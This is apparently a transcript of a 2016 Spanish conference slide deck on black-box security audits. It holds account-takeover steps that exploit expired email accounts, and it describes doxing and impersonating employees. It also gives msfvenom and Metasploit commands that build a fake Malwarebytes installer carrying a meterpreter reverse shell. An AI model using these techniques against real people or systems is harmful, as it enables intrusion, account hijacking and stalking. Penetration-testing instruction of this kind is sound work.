Auditoría informática de seguridad de caja negra en el sur

Auditoría de seguridad

en el surPor Jorge Websec

24/1/2016 WWW.QUANTIKA14.COM 1

¿Quién soy yo?


•Fundador de empresas de seguridad informática QuantiKa14.•Fundador de EXO Security, localización de personas.•Dueño del bar K’talo en la calle niebla 25, Sevilla.•Fundador y miembro del proyecto WordPressA.•Creador del proyecto Triana Browser.•Autor del blog www.botentriana.wordpress.com•Especialista en bots y BigData.

Seguridad en el sur…

•Sevilla: 1.100 •Cádiz: 393•Huelva: 161•Córdoba: 313•Málaga: 972•Jaén: 190•Almería: 269

Datos de BigData QuantiKa14.


Seguridad en el sur…

0

0,5

1

1,5

2

2,5

3

3,5

4

4,5

5

2012 2013 2014 2015

Creación de empresas Seguridad Informática

Andalucia Madrid Barcelona

•Aumento del crecimiento en Andalucía.•Constante crecimiento en Madrid y Barcelona.


Procesos…

•Firma de contrato.•Objetivos.•Recogida de datos (footprinting & fingerprinting)•Análisis de vulnerabilidades.•Explotación.•Informe.


Firma de contrato

•Empleados y directivos deben firmar un contrato.•Proveedores, colaboradores y asociados firman o son avisados.•Firma de contrato de confidencialidad y secreto.•Notificación previa de acciones que pueden perjudicar gravemente a la empresa.•Formas y métodos de pago.


Formas y métodos de pagos

•50 % en la firma del contrato.•25% a los 20 días de la firma del contrato.•25% en la entrega del informe.


OBJETIVOS

•Simular un ataque informático de caja negra.•Hacerlo en 40 días máximo.•Informar de posibles fugas de información o de accesos no autorizados.


La empresa…


IMAGINEMOS A LA EMPRESA


MECH3RO PACK

•Pack de scripts creados por Jorge Websec para la recogida de datos. BOTENTRIANA.WORDPRESS.COM•Python 2.7.9•Librerías: mechanize y beautifulSoup.


MECH3RO I

Redes sociales de la empresa.


Listado de empleados

•Listado de trabajadores en la empresa usando M3chero.•Buscadores.•Prensa.•Harvesting email con email collector Metasploit.•LinkedIn.


ASOCIACIÓN DE SEGURIDAD PRIVADA

Identificamos las asociaciones.Eventos.Páginas webs.

Obtenemos listado de empleados del departamento de seguridad.El objetivo es obtener el

listado de empleados.

La técnica de los 3 años

•Una cuenta de Hotmail, Outlook, Gmail, Yahoo, etc… duran 3 años hasta ser borrados por inactividad.•¿La cuenta de tu infancia es la misma que usas para las redes sociales?


MECH3RO II : validar cuenta de email

•Dentro de Mech3ro Pack encontraremos “email_validator.py”para validar cuentas email masivamente.


Mech3ro III: validar cuentas de Twitter y FB

•Las cuentas de la lista que no existan por tiempo inactivo o porque el usuario los haya borrado, creamos una nueva lista diferente.•La nueva lista la usará “validator_twitter_fbyTwt.py” para asociar unacuenta de correo a una cuenta de Facebook y Twitter.•Las que den positivas en las cuentas de RRSS solo hará falta crear de nuevo la cuenta y darle a recordar contraseña.


PROCESOS


LISTA DE EMAILS

¿EXISTE? SINo

ASOCIADO ALGUNA CUENTA

Si

No

CREAR CORREO

RECUPERAR CONTRASEÑA

OBJETIVO CUMPLIDO

• Conseguimos acceso a varias cuentas de Facebook y Twitter.

• Haciéndonos pasar por uno de los empleados de seguridad le pedimos a otro que hemos

perdido el listado y nos lo manda.

¿Localizar a empleados?

•El uso de Internet siempre deja rastros de tu actividad en la vida real.•Sabiendo usar los datos que se exponen en las diferentes plataformas podemos saber donde te mueves.


Doxing: investigar, analizar, recopilar información de una persona en Internet. Asociar una identidad virtual a una física.

MECH3RO IV: Meetup


Bot de MeetupACCEDE A MEETUP

http://www.meetup.com/es-ES/find/events/?allMeetups=true&radius=62&userFreeform=Sevilla

Bot de Meetup 2

ACCEDE A CADA EVENTO

MECH3RO V: CRUZAR DATOS I


Usuarios que van a evento de MeetUp

Diego Martínez

Ricardo Gonzalez

Juan Jiménez

Un poquito de Ingeniería social…

•Sabíamos los eventos próximosque visitarían.•Sabiendo sus redes socialessabíamos sus gustos, publicaciones y comentarios.•Sabíamos que la empresa habíaimplementado un sistema de acceso hace poco por unasubvención. ¿Biometría?


¿Qué averiguamos?

•Existe un sistema de acceso a diferentes salas.•Una empleada guarda claves de accesos a diferentes salas en un txt en su ordenador. [¿Quién?]•Los empleados suelen frecuentar diferentes bares de la zona donde se encuentra el edificio de la empresa. [Podemos identificar según los clientes Wifi]


Bares de la zona…

•Café de Indias -> Wifi muy genérico ESSID:“CAFÉ-INDIAS-WIFI”.•Mac Donald -> Demasiado genérico.•Bar “el eructo feliz” -> ESSID:”ERUCTOFELIZ-WIFI”.


De esta forma podíamos identificar en que eventos se encuentran

empleados de la empresa.

Suplantación de email


Fake Malwarebytes Anti-malware


Creamos el payload


Creamos payload II

•# msfvenom -p windows/meterpreter/reverse_tcp -b ‘\x00’ LHOST=192.168.1.10 LPORT=4444 -x /home/root/Escritorio/FAKE.exe -f exe > bicho.exe

•-b: evitar caracteres vacíos o malos.•-x: plantilla•-i: interacciones del encoder•-e: encoder -> x86/shikata_ga_nai


Binder


msf> use multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST <IP_Escucha> (por ejemplo set LHOST 192.168.5.55)msf exploit(handler) > set LPORT <Puerto Escucha> (por ejemplo set LPORT 4444)msf exploit(handler) > exploit[*] Started reverse handler on 192.168.75.35:4444[*] Starting the payload handler…

Escuchamos


Pivoting: Mapa de red

Desde las máquinas infectadas hacemos un escáner de la red.

Con el correo que le enviamos…

Registramos el USER-AGENT y la IP Local.http://net.ipcalf.com/

http://net.ipcalf.com/

Le enviamos…Un mail con el enlace maligno.

¡Muchas gracias por su atención!

@QuantiKa14

/quantika14

/quantika14

Si quieres descargar MECH3RO PACK

VISITA MI BLOG BOTENTRIANA.WORDPRESS.COM

Auditoría informática de seguridad de caja negra en el sur

Internet

Transcript of Auditoría informática de seguridad de caja negra en el sur